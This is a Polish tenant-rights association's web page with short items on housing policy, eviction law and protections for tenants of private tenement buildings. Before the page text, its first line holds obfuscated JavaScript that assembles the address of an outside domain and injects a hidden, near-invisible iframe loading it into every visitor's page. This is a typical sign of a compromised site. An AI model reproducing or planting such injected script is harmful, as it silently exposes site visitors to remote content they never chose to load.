jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); NASZE SPRAWY

Rząd PO i PSL przez sześć lat sprawowania władzy najzwyczajniej w świecie łamał artykuł 75 konstytucji i to w wymiarze, który miał największe przełożenie na życie milionów Polaków. Rząd Donalda Tuska tym samym ustanowił mieszkanie, zostało zmuszonych do tego, żeby wziąć kredyt na monopol deweloperów na rynku mieszkaniowym. Każdy monopol jest zły, ale ten jest wyjątkowo patologiczny. Miliony Polaków, żeby stać ich było na 30-40 lat - pisze Jan Śpiewak, przewodniczący stowarzyszenia Miasto jest Nasze, dla Wirtualnej Polski. Więcej

Obowiązujące prawo nie zapewnia realnej ochrony przed bezdomnością w wyniku eksmisji, w sytuacji gdy dłużnikowi nie zostało przyznane prawo do lokalu socjalnego - uważa rzecznik praw obywatelskich.Więcej

Ochrona konstytucyjna  nie dla lokatorów prywatnych kamienic

Lokatorzy prywatnych kamienic  to obecnie obywatele tego kraju stanowiąca jedną
z najbardziej pokrzywdzonych grup w okresie transformacji ustrojowej.Pełną odpowiedzialność za fakt, że  lokatorzy mieszkają w budynkach stanowiących obecnie własność osób prywatnych ponosi państwo polskie.Więcej

Z inicjatywy Anny Grodzkiej, 17 listopada br. w domu Polonii w Krakowie odbyła się zorganizowana przy współpracy z Kancelarią Sprawiedliwości Społecznej konferencja lokatorska pod hasłem "PRAWO DO MIESZKANIA PRAWEM CZŁOWIEKA". Więcej informacji

 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.